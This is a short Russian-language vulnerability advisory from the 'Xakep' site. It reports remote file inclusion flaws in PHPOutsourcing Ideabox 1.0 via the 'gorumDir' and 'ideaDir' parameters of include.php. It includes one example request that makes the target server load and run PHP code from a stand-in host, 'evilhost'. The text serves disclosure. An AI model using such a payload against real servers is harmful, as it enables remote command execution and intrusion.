Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Несколько уязвимостей включения файла обнаружены в
PHPOutsourcing Ideabox. Удаленный пользователь может выполнить произвольные команды на целевом сервере. 

F0KP сообщил, что сценарий include.php не проверяет данные, переданные пользователем. Удаленный пользователь может представить специально обработанный URL, который заставит целевой сервер включить произвольный PHP файл, расположенный на удаленном сервере. Выполняемый PHP код может содержать команды операционной системы. Пример: 

http://[target]/ideabox/include.php?gorumDir=http://evilhost

Также уязвима переменная 'ideaDir'. 

Уязвимость обнаружена в PHPOutsourcing Ideabox 1.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии